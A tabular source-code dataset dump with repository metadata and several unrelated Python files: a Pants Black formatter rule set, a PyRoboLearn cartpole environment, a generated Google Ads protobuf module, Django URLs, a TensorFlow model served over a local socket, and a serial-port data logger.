hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a71d82604058e50763d2182e41135dff9c1f9cef
| 202
|
py
|
Python
|
print function/print Numbers/7Print_greet.py
|
palakbaphna/pyprac
|
992770d5aed73c632a69b4bb22f471f35d083ee5
|
[
"Apache-2.0"
] | null | null | null |
print function/print Numbers/7Print_greet.py
|
palakbaphna/pyprac
|
992770d5aed73c632a69b4bb22f471f35d083ee5
|
[
"Apache-2.0"
] | null | null | null |
print function/print Numbers/7Print_greet.py
|
palakbaphna/pyprac
|
992770d5aed73c632a69b4bb22f471f35d083ee5
|
[
"Apache-2.0"
] | null | null | null |
#Write a program that greets the user by printing the word "Hello", a comma,
# the name of the user and an exclamation mark after it
name = str(input("What is your name?"))
print("Hello, %s!" %name)
| 25.25
| 76
| 0.70297
|
95f36db5d41cb42274c19adec94c32eaecf83502
| 6,689
|
py
|
Python
|
src/python/pants/backend/python/lint/black/rules.py
|
adam-singer/pants
|
0fc6fb71e983487b3795ce6f34292967841e994d
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/python/lint/black/rules.py
|
adam-singer/pants
|
0fc6fb71e983487b3795ce6f34292967841e994d
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/python/lint/black/rules.py
|
adam-singer/pants
|
0fc6fb71e983487b3795ce6f34292967841e994d
|
[
"Apache-2.0"
] | 1
|
2021-08-01T05:43:34.000Z
|
2021-08-01T05:43:34.000Z
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from dataclasses import dataclass
from pathlib import PurePath
from typing import Tuple
from pants.backend.python.lint.black.subsystem import Black
from pants.backend.python.lint.python_fmt import PythonFmtRequest
from pants.backend.python.target_types import InterpreterConstraintsField, PythonSources
from pants.backend.python.util_rules import pex
from pants.backend.python.util_rules.pex import (
PexInterpreterConstraints,
PexRequest,
PexRequirements,
VenvPex,
VenvPexProcess,
)
from pants.core.goals.fmt import FmtResult
from pants.core.goals.lint import LintRequest, LintResult, LintResults
from pants.core.util_rules import stripped_source_files
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.engine.fs import Digest, GlobMatchErrorBehavior, MergeDigests, PathGlobs
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import FieldSet
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.logging import LogLevel
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class BlackFieldSet(FieldSet):
required_fields = (PythonSources,)
sources: PythonSources
interpreter_constraints: InterpreterConstraintsField
class BlackRequest(PythonFmtRequest, LintRequest):
field_set_type = BlackFieldSet
@dataclass(frozen=True)
class SetupRequest:
request: BlackRequest
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(*, source_files: SourceFiles, black: Black, check_only: bool) -> Tuple[str, ...]:
args = []
if check_only:
args.append("--check")
if black.config:
args.extend(["--config", black.config])
args.extend(black.args)
# NB: For some reason, Black's --exclude option only works on recursive invocations, meaning
# calling Black on a directory(s) and letting it auto-discover files. However, we don't want
# Black to run over everything recursively under the directory of our target, as Black should
# only touch files directly specified. We can use `--include` to ensure that Black only
# operates on the files we actually care about.
args.extend(["--include", "|".join(re.escape(f) for f in source_files.files)])
args.extend(PurePath(f).parent.as_posix() for f in source_files.files)
return tuple(args)
@rule(level=LogLevel.DEBUG)
async def setup_black(
setup_request: SetupRequest, black: Black, python_setup: PythonSetup
) -> Setup:
# Black requires 3.6+ but uses the typed-ast library to work with 2.7, 3.4, 3.5, 3.6, and 3.7.
# However, typed-ast does not understand 3.8+, so instead we must run Black with Python 3.8+
# when relevant. We only do this if if <3.8 can't be used, as we don't want a loose requirement
# like `>=3.6` to result in requiring Python 3.8, which would error if 3.8 is not installed on
# the machine.
all_interpreter_constraints = PexInterpreterConstraints.create_from_compatibility_fields(
(field_set.interpreter_constraints for field_set in setup_request.request.field_sets),
python_setup,
)
tool_interpreter_constraints = (
all_interpreter_constraints
if (
all_interpreter_constraints.requires_python38_or_newer()
and black.options.is_default("interpreter_constraints")
)
else PexInterpreterConstraints(black.interpreter_constraints)
)
black_pex_request = Get(
VenvPex,
PexRequest(
output_filename="black.pex",
internal_only=True,
requirements=PexRequirements(black.all_requirements),
interpreter_constraints=tool_interpreter_constraints,
main=black.main,
),
)
config_digest_request = Get(
Digest,
PathGlobs(
globs=[black.config] if black.config else [],
glob_match_error_behavior=GlobMatchErrorBehavior.error,
description_of_origin="the option `--black-config`",
),
)
source_files_request = Get(
SourceFiles,
SourceFilesRequest(field_set.sources for field_set in setup_request.request.field_sets),
)
source_files, black_pex, config_digest = await MultiGet(
source_files_request, black_pex_request, config_digest_request
)
source_files_snapshot = (
source_files.snapshot
if setup_request.request.prior_formatter_result is None
else setup_request.request.prior_formatter_result
)
input_digest = await Get(Digest, MergeDigests((source_files_snapshot.digest, config_digest)))
process = await Get(
Process,
VenvPexProcess(
black_pex,
argv=generate_args(
source_files=source_files, black=black, check_only=setup_request.check_only
),
input_digest=input_digest,
output_files=source_files_snapshot.files,
description=f"Run Black on {pluralize(len(setup_request.request.field_sets), 'file')}.",
level=LogLevel.DEBUG,
),
)
return Setup(process, original_digest=source_files_snapshot.digest)
@rule(desc="Format with Black", level=LogLevel.DEBUG)
async def black_fmt(field_sets: BlackRequest, black: Black) -> FmtResult:
if black.skip:
return FmtResult.skip(formatter_name="Black")
setup = await Get(Setup, SetupRequest(field_sets, check_only=False))
result = await Get(ProcessResult, Process, setup.process)
return FmtResult.from_process_result(
result,
original_digest=setup.original_digest,
formatter_name="Black",
strip_chroot_path=True,
)
@rule(desc="Lint with Black", level=LogLevel.DEBUG)
async def black_lint(field_sets: BlackRequest, black: Black) -> LintResults:
if black.skip:
return LintResults([], linter_name="Black")
setup = await Get(Setup, SetupRequest(field_sets, check_only=True))
result = await Get(FallibleProcessResult, Process, setup.process)
return LintResults(
[LintResult.from_fallible_process_result(result, strip_chroot_path=True)],
linter_name="Black",
)
def rules():
return [
*collect_rules(),
UnionRule(PythonFmtRequest, BlackRequest),
UnionRule(LintRequest, BlackRequest),
*pex.rules(),
*stripped_source_files.rules(),
]
| 36.551913
| 100
| 0.719839
|
5828b63f391dedb073b7537080e01780e97ab287
| 8,625
|
py
|
Python
|
pyrobolearn/envs/control/cartpole.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 2
|
2021-01-21T21:08:30.000Z
|
2022-03-29T16:45:49.000Z
|
pyrobolearn/envs/control/cartpole.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | null | null | null |
pyrobolearn/envs/control/cartpole.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 1
|
2020-09-29T21:25:39.000Z
|
2020-09-29T21:25:39.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provide the inverted pole on a cart (Cartpole) environment.
This is based on the control problem proposed in OpenAI Gym:
"A pole is attached by an un-actuated joint to a cart, which moves along a frictionless track. The system is
controlled by applying a force of +1 or -1 to the cart. The pendulum starts upright, and the goal is to prevent it
from falling over. A reward of +1 is provided for every timestep that the pole remains upright. The episode ends when
the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center." [1]
Note that compared to [1], you can specify the number of links that forms the inverted pole.
References:
- [1] Cartpole environment in OpenAI Gym: https://gym.openai.com/envs/CartPole-v1/
- [2] "Neuronlike Adaptive Elements That Can Solve Difficult Learning Control Problem", Barto et al., 1993.
"""
import numpy as np
import pyrobolearn as prl
from pyrobolearn.envs.control.control import ControlEnv
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2019, PyRoboLearn"
__credits__ = ["OpenAI", "Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class CartpoleEnv(ControlEnv):
r"""Cartpole Environment
This is based on the control problem proposed in OpenAI Gym:
"A pole is attached by an un-actuated joint to a cart, which moves along a frictionless track. The system is
controlled by applying a force of +1 or -1 to the cart. The pendulum starts upright, and the goal is to prevent it
from falling over. A reward of +1 is provided for every timestep that the pole remains upright. The episode ends
when the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center." [1]
Note that compared to [1], you can specify the number of links that forms the inverted pole.
Here are the various environment features (from [1]):
- world: basic world with gravity enabled, a basic floor and the cartpole.
- state: the state is given by :math:`[x, \dot{x}, q_1, \dot{q}_1]` for one inverted pole with one link.
- action: discrete forces applied on the cart (+10., -10.)
- reward: +1 until termination step
- initial state generator: initialize uniformly the state with [-0.05, 0.05]
- physics randomizer: uniform distribution of the mass of the [mass - mass/10, mass + mass/10]
- terminal conditions:
- pole angle is more than 12 degrees
- cart position is more than 2.5m from the center
- episode length is greater than 200 steps
References:
- [1] Cartpole environment in OpenAI Gym: https://gym.openai.com/envs/CartPole-v1/
- [2] "Neuronlike Adaptive Elements That Can Solve Difficult Learning Control Problem", Barto et al., 1993.
"""
def __init__(self, simulator=None, num_links=1, num_steps=200, verbose=True):
"""
Initialize the Cartpole environment.
Args:
simulator (Simulator): simulator instance. If None, by default, it will instantiate the Bullet
simulator.
num_links (int): the number of links that forms the inverted pendulum.
verbose (bool): if True, it will print information when creating the environment.
"""
# simulator
if simulator is None:
simulator = prl.simulators.Bullet(render=verbose)
# create basic world
world = prl.worlds.World(simulator)
robot = prl.robots.CartPole(simulator, position=(0., 0., 0.), num_links=num_links, inverted_pole=False)
world.load_robot(robot)
robot.disable_motor(robot.joints)
if verbose:
robot.print_info()
# create state: [x, \dot{x}, q_i, \dot{q}_i]
state = prl.states.JointPositionState(robot) + prl.states.JointVelocityState(robot)
if verbose:
print("\nState: {}".format(state))
# create action: f_cart = (-10., +10.)
action = prl.actions.JointForceAction(robot=robot, joint_ids=0, discrete_values=[-10., 10.])
if verbose:
print("\nAction: {}".format(action))
# create terminal condition
pole_angle_condition = prl.terminal_conditions.JointPositionCondition(robot, joint_ids=1,
bounds=(-12 * np.pi/180, 12 * np.pi/180),
out=False, stay=True)
cart_position_condition = prl.terminal_conditions.LinkPositionCondition(robot, link_id=1, bounds=(-1., 1.),
dim=0, out=False, stay=True)
time_length_condition = prl.terminal_conditions.TimeLimitCondition(num_steps=num_steps)
terminal_conditions = [pole_angle_condition, cart_position_condition, time_length_condition]
# create reward: +1 until termination step
reward = prl.rewards.TerminalReward(terminal_conditions=terminal_conditions, subreward=1., final_reward=1.)
if verbose:
print("\nReward: {}".format(state))
# create initial state generator: generate the state each time we reset the environment
def reset_robot(robot): # function to disable the motors every time we reset the joint state
def reset():
robot.disable_motor(robot.joints)
return reset
initial_state_generator = prl.states.generators.UniformStateGenerator(state=state, low=-0.05, high=0.05,
fct=reset_robot(robot))
# create environment using composition
super(CartpoleEnv, self).__init__(world=world, states=state, rewards=reward, actions=action,
terminal_conditions=terminal_conditions,
initial_state_generators=initial_state_generator)
# class CartDoublePoleEnv(Env):
# r"""CartDoublepole Environment
#
# This provide the double inverted poles on a cart environment. Compare to the standard inverted pendulum on a cart,
# the goal this time is to balance two poles of possibly different lengths / masses, which are initialized at
# different angles but connected at the same joint attached to the cart.
# """
#
# def __init__(self, simulator=None, pole_lengths=(1., 1.), pole_masses=(1., 1.), pole_angles=(0., 0.)):
# """
# Initialize the double inverted poles on a cart environment.
#
# Args:
# simulator (Simulator): simulator instance.
# """
# # create basic world
# world = prl.worlds.BasicWorld(simulator)
# robot = prl.robots.CartDoublePole(simulator, pole_lengths=pole_lengths, pole_masses=pole_masses,
# pole_angles=pole_angles)
# world.load_robot(robot)
#
# # create state
# state =
#
# # create action
# action =
#
# # create reward
# reward =
#
# # create terminal condition
# terminal_condition =
#
# # create initial state generator
# initial_state_generator =
#
# # create environment using composition
# super(CartDoublePoleEnv, self).__init__(world=world, states=state, rewards=reward, actions=action)
# Test
if __name__ == "__main__":
from itertools import count
# create simulator
sim = prl.simulators.Bullet()
# create environment
env = CartpoleEnv(sim)
state = env.reset()
# run simulation
for _ in count():
state, reward, done, info = env.step(sleep_dt=1./240)
print("done: {}, reward: {}, state: {}".format(done, reward, state))
# # create basic world
# sim = prl.simulators.Bullet()
# world = prl.worlds.World(sim)
# robot = prl.robots.CartPole(sim, num_links=1, inverted_pole=True)
# robot.disable_motor(robot.joints)
# world.load_robot(robot)
#
# # create state: [x, \dot{x}, q_i, \dot{q}_i]
# state = prl.states.JointPositionState(robot) + prl.states.JointVelocityState(robot)
#
# # create action
# action = prl.actions.JointForceAction(robot=robot, joint_ids=0, discrete_values=[-10., 10.])
#
# flip = 1
# for i in prl.count():
# # if i % 10 == 0:
# # flip = (flip+1) % 2
# action(flip)
# world.step(sleep_dt=sim.dt)
| 43.341709
| 120
| 0.641159
|
edd861c146aa83221cb13988a31f0ac1ac9c2438
| 5,144
|
py
|
Python
|
google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py
|
jwygoda/google-ads-python
|
863892b533240cb45269d9c2cceec47e2c5a8b68
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py
|
jwygoda/google-ads-python
|
863892b533240cb45269d9c2cceec47e2c5a8b68
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py
|
jwygoda/google-ads-python
|
863892b533240cb45269d9c2cceec47e2c5a8b68
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v1/proto/enums/price_extension_type.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v1/proto/enums/price_extension_type.proto',
package='google.ads.googleads.v1.enums',
syntax='proto3',
serialized_options=_b('\n!com.google.ads.googleads.v1.enumsB\027PriceExtensionTypeProtoP\001ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v1/enums;enums\242\002\003GAA\252\002\035Google.Ads.GoogleAds.V1.Enums\312\002\035Google\\Ads\\GoogleAds\\V1\\Enums\352\002!Google::Ads::GoogleAds::V1::Enums'),
serialized_pb=_b('\n>google/ads/googleads_v1/proto/enums/price_extension_type.proto\x12\x1dgoogle.ads.googleads.v1.enums\x1a\x1cgoogle/api/annotations.proto\"\xeb\x01\n\x16PriceExtensionTypeEnum\"\xd0\x01\n\x12PriceExtensionType\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\n\n\x06\x42RANDS\x10\x02\x12\n\n\x06\x45VENTS\x10\x03\x12\r\n\tLOCATIONS\x10\x04\x12\x11\n\rNEIGHBORHOODS\x10\x05\x12\x16\n\x12PRODUCT_CATEGORIES\x10\x06\x12\x11\n\rPRODUCT_TIERS\x10\x07\x12\x0c\n\x08SERVICES\x10\x08\x12\x16\n\x12SERVICE_CATEGORIES\x10\t\x12\x11\n\rSERVICE_TIERS\x10\nB\xec\x01\n!com.google.ads.googleads.v1.enumsB\x17PriceExtensionTypeProtoP\x01ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v1/enums;enums\xa2\x02\x03GAA\xaa\x02\x1dGoogle.Ads.GoogleAds.V1.Enums\xca\x02\x1dGoogle\\Ads\\GoogleAds\\V1\\Enums\xea\x02!Google::Ads::GoogleAds::V1::Enumsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE = _descriptor.EnumDescriptor(
name='PriceExtensionType',
full_name='google.ads.googleads.v1.enums.PriceExtensionTypeEnum.PriceExtensionType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BRANDS', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVENTS', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LOCATIONS', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEIGHBORHOODS', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRODUCT_CATEGORIES', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRODUCT_TIERS', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICES', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICE_CATEGORIES', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICE_TIERS', index=10, number=10,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=155,
serialized_end=363,
)
_sym_db.RegisterEnumDescriptor(_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE)
_PRICEEXTENSIONTYPEENUM = _descriptor.Descriptor(
name='PriceExtensionTypeEnum',
full_name='google.ads.googleads.v1.enums.PriceExtensionTypeEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=128,
serialized_end=363,
)
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE.containing_type = _PRICEEXTENSIONTYPEENUM
DESCRIPTOR.message_types_by_name['PriceExtensionTypeEnum'] = _PRICEEXTENSIONTYPEENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PriceExtensionTypeEnum = _reflection.GeneratedProtocolMessageType('PriceExtensionTypeEnum', (_message.Message,), dict(
DESCRIPTOR = _PRICEEXTENSIONTYPEENUM,
__module__ = 'google.ads.googleads_v1.proto.enums.price_extension_type_pb2'
,
__doc__ = """Container for enum describing types for a price extension.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v1.enums.PriceExtensionTypeEnum)
))
_sym_db.RegisterMessage(PriceExtensionTypeEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 39.875969
| 884
| 0.77119
|
98f4c5a5d7e6f34e06cad5324f9401ca3d0646f8
| 279
|
py
|
Python
|
embark/users/urls.py
|
YulianaPoliakova/embark
|
5dc11114b2348ce1b580a9f18dd081018ac9d07f
|
[
"MIT"
] | 149
|
2021-07-27T08:22:33.000Z
|
2022-03-26T23:25:20.000Z
|
embark/users/urls.py
|
IoTSecurity101/embark
|
cb0336459bf8d2a59c54b001fc0f4bf126a9b986
|
[
"MIT"
] | 22
|
2021-07-28T07:32:11.000Z
|
2022-03-30T12:02:49.000Z
|
embark/users/urls.py
|
IoTSecurity101/embark
|
cb0336459bf8d2a59c54b001fc0f4bf126a9b986
|
[
"MIT"
] | 23
|
2021-07-30T07:34:53.000Z
|
2022-03-24T12:37:51.000Z
|
# from django.urls import path, include
from django.urls import path
from . import views
urlpatterns = [
path('signin', views.signin, name='embark-signin'),
path('signup', views.signup, name='embark-signup'),
path('signout', views.signout, name='embark-signout')
]
| 25.363636
| 57
| 0.698925
|
2d08c6910481bcba0bc97181575ff3234dd1a236
| 3,811
|
py
|
Python
|
results/Random16/Random16Last-DIA16/testserver.py
|
sangttruong/GinRummy
|
45f6a10eeb53b979b152d6bf9e904f38df9473f0
|
[
"MIT"
] | 3
|
2020-09-07T02:02:20.000Z
|
2021-06-30T16:27:08.000Z
|
results/Random16/Random16Last-DIA16/testserver.py
|
sangttruong/GinRummy
|
45f6a10eeb53b979b152d6bf9e904f38df9473f0
|
[
"MIT"
] | 10
|
2021-06-22T17:10:12.000Z
|
2021-07-18T02:02:03.000Z
|
results/Random16/Random16Last-DIA16/testserver.py
|
sangttruong/GinRummy
|
45f6a10eeb53b979b152d6bf9e904f38df9473f0
|
[
"MIT"
] | 3
|
2021-04-04T18:02:27.000Z
|
2022-03-07T03:18:14.000Z
|
import numpy as np
import sys
import os
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
sys.stderr = stderr
# disable any warnings by TensorFlow.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import datetime
import random
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import tensorflow as tf
#import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (4,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
x41 = Conv2D(filters = 16, kernel_size = 4, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x41')(x)
x4 = Flatten(name = 'x4')(x41)
x31 = Conv2D(filters = 16, kernel_size = 3, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x31')(x)
x3 = Flatten(name = 'x3')(x31)
x21 = Conv2D(filters = 16, kernel_size = 2, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x21')(x)
x2 = Flatten(name = 'x2')(x21)
o41 = Conv2D(filters = 16, kernel_size = 4, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o41')(o)
o4 = Flatten(name = 'o4')(o41)
o31 = Conv2D(filters = 16, kernel_size = 3, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o31')(o)
o3 = Flatten(name = 'o3')(o31)
o21 = Conv2D(filters = 16, kernel_size = 2, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o21')(o)
o2 = Flatten(name = 'o2')(o21)
i = concatenate([f, o4, o3, o2, x4, x3, x2], name = 'concat')
i1 = Dense(16, activation = 'relu', name = 'dense1')(i)
y = Dense(1, name = 'y')(i1)
model = Model(inputs = [x, f, g, o], outputs = y)
model.compile(loss = 'mse', optimizer = 'adam')
return model
NN = DualInception()
checkpoint_path = '/Users/sangtruong_2021/Desktop/Checkpoint/cp.ckpt'
NN.load_weights(checkpoint_path)
print(NN.summary())
def addGeoRelation_Numpy(x):
t = []
for i in range(13):
n = i
while(n < 52):
z = 1
next = n+13*z
while(next < 52):
t.append(x[n]*x[next])
z += 1
next = n+13*z
if n != 12 and n != 25 and n != 38 and n != 51:
t.append(x[n]*x[n+1])
n += 13
return np.array(t)
import socket
import ast
listensocket = socket.socket()
listensocket.bind(("127.0.0.1", 8888))
listensocket.listen(999999999)
print("Server started at 127.0.0.1 on port " + str(8888))
running = True
while running:
(clientsocket, address) = listensocket.accept()
# print("New connection make!")
xfo = clientsocket.recv(1024).decode() # Get a number from Java
xfo = xfo[1:-2]
xfo = list(map(float, xfo.split(", ")))
xfo = np.array(xfo)
x = xfo[0:52]
g = addGeoRelation_Numpy(x)
g = g.reshape((-1,126))
x = x.reshape((-1,4,13,1))
f = xfo[53:57]
f = f.reshape((-1,4))
o = xfo[57:109]
o = o.reshape((-1,4,13,1))
# print(x)
# print(g)
# print(f)
# print(o)
y = NN([x, f, g, o])
# print(y)
y = y.numpy()
y = y[0][0]
# print(y)
# print(type(y))
newMessage = str(y)
# print("Output: " + newMessage)
clientsocket.send(newMessage.encode()) # Send a number back to Java
#print("Computed and sent!")
clientsocket.close()
| 30.733871
| 146
| 0.625558
|
3577db12885dab7e7c69c55e40635876cb1df499
| 4,178
|
py
|
Python
|
multilogger.py
|
guolivar/multi-serial-logger
|
cdc91daa65eeb1148a291ca7371c995390cf0992
|
[
"MIT"
] | null | null | null |
multilogger.py
|
guolivar/multi-serial-logger
|
cdc91daa65eeb1148a291ca7371c995390cf0992
|
[
"MIT"
] | null | null | null |
multilogger.py
|
guolivar/multi-serial-logger
|
cdc91daa65eeb1148a291ca7371c995390cf0992
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Load the libraries
import serial # Serial communications
import time # Timing utilities
import os,sys # OS utils to keep working directory
# Change working directory to the script's path
os.chdir(os.path.dirname(sys.argv[0]))
# Set the time constants
rec_time=time.gmtime()
timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",rec_time)
prev_minute=rec_time[4]
# Read the settings from the settings file
settings_file = open("./settings.txt")
# How many serial ports? -- MUST match the number of serial config lines in the settings file
nports = eval(settings_file.readline().rstrip('\n'))
# Initialise the lists of data to hold parameters for each instrument
prefixes = []
ports = []
bauds = []
xpars = []
xbytes = []
eols = []
# Read each of the serial config lines from the settings file
for i in range(nports):
# e.g. "instrumentX,/dev/ttyUSB0,9600,N,8,n"
settings_line = settings_file.readline().rstrip('\n').split(',')
prefixes.append(settings_line[0])
ports.append(settings_line[1])
bauds.append(settings_line[2])
xpars.append(settings_line[3])
xbytes.append(eval(settings_line[4]))
if settings_line[5] == 'r':
eols.append(b'\r')
elif settings_line[5] == 'nr':
eols.append(b'\n\r')
else:
eols.append(b'\n')
print(ports)
# path for data files
# e.g. "/home/logger/data/"
datapath = settings_file.readline().rstrip('\n')
print(datapath)
# Format for filenames
fnamefmt = "%Y%m%d.txt"
# LOG some info
current_LOG_name = datapath + time.strftime("%Y%m%d.LOG", rec_time)
current_file = open(current_LOG_name, "a")
current_file.write(timestamp + " Logging starts\n")
current_file.write(",".join(prefixes))
current_file.write("\n")
current_file.write(",".join(ports))
current_file.write("\n")
current_file.write(",".join(bauds))
current_file.write("\n")
current_file.write(",".join(xpars))
current_file.write("\n")
current_file.write(",".join(str(xbytes)))
current_file.write("\n")
current_file.write(",".join(str(eols)))
current_file.write("\n")
current_file.write(datapath)
current_file.write("\n")
# Setup the Serial ports for communication
ser = []
for i in range(nports):
current_file.write("Opening port " + ports[i] + "\n")
ser.append(serial.Serial())
ser[i].port = ports[i]
ser[i].baudrate = bauds[i]
ser[i].parity = xpars[i]
ser[i].bytesize = xbytes[i]
ser[i].open()
ser[i].flushInput()
ser[i].flushOutput()
current_file.write("Port " + ports[i] + " flushed\n")
# Close the settings file
settings_file.close()
# Close the LOG file for now
current_file.flush()
current_file.close()
# Start the logging
while True:
for i in range(nports):
print(ports[i])
try:
# Hacks to work with custom end of line
leneol = len(eols[i])
bline = bytearray()
# Get a line of data from the port
while True:
c = ser[i].read(1)
bline += c
if bline[-leneol:] == eols[i]:
break
## Parse the data line
line = bline.decode("utf-8").rstrip()
# Set the time for the record
rec_time=time.gmtime()
timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",rec_time)
# Build the line to save to file
file_line = timestamp + "\t" + line
print(file_line)
# Save it to the appropriate file
current_file_name = datapath + prefixes[i] + time.strftime("_%Y%m%d.txt",rec_time)
current_file = open(current_file_name,"a")
current_file.write(file_line+"\n")
current_file.flush()
current_file.close()
file_line = ""
bline = bytearray()
except:
current_LOG_name = datapath + time.strftime("%Y%m%d.LOG", rec_time)
current_file = open(current_LOG_name, "a")
current_file.write(timestamp + " Unexpected error with port " + ports[i] + "\n")
current_file.write(timestamp + " No data recorded\n")
current_file.flush()
current_file.close()
print('I\'m done now')
| 33.693548
| 94
| 0.628291
|
2a8c4604331efff38c7a000f0a3b3e3e75a42771
| 5,443
|
py
|
Python
|
tests/providers/microsoft/azure/hooks/test_azure_data_lake.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 2
|
2021-07-30T17:25:56.000Z
|
2021-08-03T13:51:09.000Z
|
